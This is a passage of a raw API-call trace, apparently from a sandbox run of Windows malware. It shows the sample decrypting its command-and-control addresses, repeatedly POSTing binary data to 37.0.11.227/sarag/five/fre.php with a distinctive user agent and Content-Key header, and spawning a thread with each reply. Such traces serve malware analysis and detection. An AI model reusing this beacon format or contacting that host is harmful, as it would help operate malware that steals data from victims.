(s=0xb98) returned 0 [0330.701] GetProcessHeap () returned 0x690000 [0330.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0330.701] GetProcessHeap () returned 0x690000 [0330.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0330.702] GetProcessHeap () returned 0x690000 [0330.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0330.702] GetProcessHeap () returned 0x690000 [0330.703] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0330.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18e4) returned 0xb98 [0330.711] Sleep (dwMilliseconds=0xea60) [0330.713] GetProcessHeap () returned 0x690000 [0330.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0330.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.714] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.730] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0330.738] GetProcessHeap () returned 0x690000 [0330.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0330.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.740] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0330.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.740] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.741] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.741] GetProcessHeap () returned 0x690000 [0330.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0330.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.743] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0330.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.743] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0330.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.744] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0330.744] GetProcessHeap () returned 0x690000 [0330.744] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0330.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.745] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0330.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.746] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0330.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.747] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0330.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.748] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0330.748] GetProcessHeap () returned 0x690000 [0330.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0330.748] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0330.750] GetProcessHeap () returned 0x690000 [0330.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0330.750] GetProcessHeap () returned 0x690000 [0330.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0330.751] GetProcessHeap () returned 0x690000 [0330.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0330.751] GetProcessHeap () returned 0x690000 [0330.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0330.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0330.771] GetProcessHeap () returned 0x690000 [0330.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0330.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.772] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0330.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.773] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.774] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.774] GetProcessHeap () returned 0x690000 [0330.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0330.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.775] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0330.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.776] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0330.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.777] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0330.777] GetProcessHeap () returned 0x690000 [0330.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0330.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.778] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0330.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.779] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0330.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.780] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0330.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.781] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0330.781] GetProcessHeap () returned 0x690000 [0330.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0330.781] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0330.781] GetProcessHeap () returned 0x690000 [0330.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0330.781] socket (af=2, type=1, protocol=6) returned 0xb9c [0330.781] connect (s=0xb9c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0330.807] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0330.807] GetProcessHeap () returned 0x690000 [0330.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0330.807] GetProcessHeap () returned 0x690000 [0330.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0330.809] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0330.811] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0330.811] GetProcessHeap () returned 0x690000 [0330.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0330.811] GetProcessHeap () returned 0x690000 [0330.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0330.812] GetProcessHeap () returned 0x690000 [0330.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0330.812] GetProcessHeap () returned 0x690000 [0330.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0330.820] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0330.822] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0330.822] GetProcessHeap () returned 0x690000 [0330.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0330.822] GetProcessHeap () returned 0x690000 [0330.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0330.823] send (s=0xb9c, buf=0x6ad508*, len=242, flags=0) returned 242 [0330.823] send (s=0xb9c, buf=0x6aba40*, len=159, flags=0) returned 159 [0330.824] GetProcessHeap () returned 0x690000 [0330.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0330.824] recv (in: s=0xb9c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0330.899] GetProcessHeap () returned 0x690000 [0330.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0330.900] GetProcessHeap () returned 0x690000 [0330.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0330.901] GetProcessHeap () returned 0x690000 [0330.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0330.903] GetProcessHeap () returned 0x690000 [0330.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0330.903] closesocket (s=0xb9c) returned 0 [0330.904] GetProcessHeap () returned 0x690000 [0330.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0330.904] GetProcessHeap () returned 0x690000 [0330.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0330.904] GetProcessHeap () returned 0x690000 [0330.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0330.905] GetProcessHeap () returned 0x690000 [0330.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0330.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18e8) returned 0xb9c [0330.907] Sleep (dwMilliseconds=0xea60) [0330.908] GetProcessHeap () returned 0x690000 [0330.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0330.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.910] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.923] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0330.932] GetProcessHeap () returned 0x690000 [0330.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0330.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.933] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0330.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.935] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.936] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.936] GetProcessHeap () returned 0x690000 [0330.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0330.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.939] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0330.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.941] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0330.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.942] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0330.943] GetProcessHeap () returned 0x690000 [0330.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0330.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.944] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0330.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.945] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0330.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.946] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0330.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.947] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0330.947] GetProcessHeap () returned 0x690000 [0330.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0330.947] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0330.949] GetProcessHeap () returned 0x690000 [0330.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0330.949] GetProcessHeap () returned 0x690000 [0330.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0330.950] GetProcessHeap () returned 0x690000 [0330.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0330.950] GetProcessHeap () returned 0x690000 [0330.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0330.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0330.974] GetProcessHeap () returned 0x690000 [0330.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0330.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.975] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0330.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.976] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.977] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.977] GetProcessHeap () returned 0x690000 [0330.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0330.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.978] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0330.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.979] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0330.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.981] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0330.981] GetProcessHeap () returned 0x690000 [0330.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0330.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.982] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0330.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.983] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0330.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.983] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0330.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.984] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0330.984] GetProcessHeap () returned 0x690000 [0330.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0330.984] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0330.984] GetProcessHeap () returned 0x690000 [0330.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0330.984] socket (af=2, type=1, protocol=6) returned 0xba0 [0330.985] connect (s=0xba0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0331.009] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0331.009] GetProcessHeap () returned 0x690000 [0331.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0331.009] GetProcessHeap () returned 0x690000 [0331.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0331.010] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.010] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0331.010] GetProcessHeap () returned 0x690000 [0331.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0331.010] GetProcessHeap () returned 0x690000 [0331.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.011] GetProcessHeap () returned 0x690000 [0331.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0331.011] GetProcessHeap () returned 0x690000 [0331.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0331.012] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.012] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0331.012] GetProcessHeap () returned 0x690000 [0331.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0331.012] GetProcessHeap () returned 0x690000 [0331.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.013] send (s=0xba0, buf=0x6ad508*, len=242, flags=0) returned 242 [0331.013] send (s=0xba0, buf=0x6aba40*, len=159, flags=0) returned 159 [0331.013] GetProcessHeap () returned 0x690000 [0331.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0331.013] recv (in: s=0xba0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0331.084] GetProcessHeap () returned 0x690000 [0331.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0331.085] GetProcessHeap () returned 0x690000 [0331.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0331.086] GetProcessHeap () returned 0x690000 [0331.086] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0331.086] GetProcessHeap () returned 0x690000 [0331.086] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0331.087] closesocket (s=0xba0) returned 0 [0331.087] GetProcessHeap () returned 0x690000 [0331.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0331.087] GetProcessHeap () returned 0x690000 [0331.088] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.088] GetProcessHeap () returned 0x690000 [0331.088] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0331.088] GetProcessHeap () returned 0x690000 [0331.088] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0331.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18ec) returned 0xba0 [0331.093] Sleep (dwMilliseconds=0xea60) [0331.094] GetProcessHeap () returned 0x690000 [0331.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0331.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.096] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: 